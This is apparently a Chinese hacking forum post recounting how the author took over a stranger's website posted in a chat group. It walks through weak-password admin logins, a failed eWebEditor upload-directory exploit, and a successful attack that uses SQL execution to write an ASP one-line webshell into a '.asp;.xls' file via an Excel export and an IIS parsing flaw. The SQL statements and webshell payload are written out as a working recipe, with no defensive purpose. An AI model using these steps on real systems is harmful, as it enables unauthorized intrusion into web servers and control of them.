群里丢了一个后台，说拿不下shell，反正闲着没事，于是有个了下面的曲折经历

 http://www.2cto.com /admin7/admin_login.asp

后台弱口令，你懂的

1.进入后台发现有eweb，还有数据库备份，果断上传图片马然后备份，如下神奇的事情出现

2.尝试了一下ewebeditor高版本>=5.5的上传建.asp文件夹的漏洞，Editor/asp/upload.asp?action=save&type=image&style=popup&cusdir=qing.asp

，捣鼓了一阵后，宣告失败。

3.抓包上传

发现没有filepath，宣告失败。

4.峰回路转

http://www.xxxxx.com/bbs/admin.asp

弱口令进去发现可以进行sql执行

于是想到了数据库插马，前提是知道网站的绝对路径

1.createtablekuge(avarchar(50))创建一个表

2.insert into kuge (a) values ('<%execute request("a")%>')插入一句话

3.selec t * into [a] in ' f:/w eb/kuge.asp;.xls' 'excel 4.0;' from kuge

 

洞.asp.xls，服务器一般不允许asp这类文件导出

 

4.droptablekuge删除这个表

导出新建数据库，利用解析漏

访问www.xxxx.com/kuge.asp.xls成功

一句话客户端提交之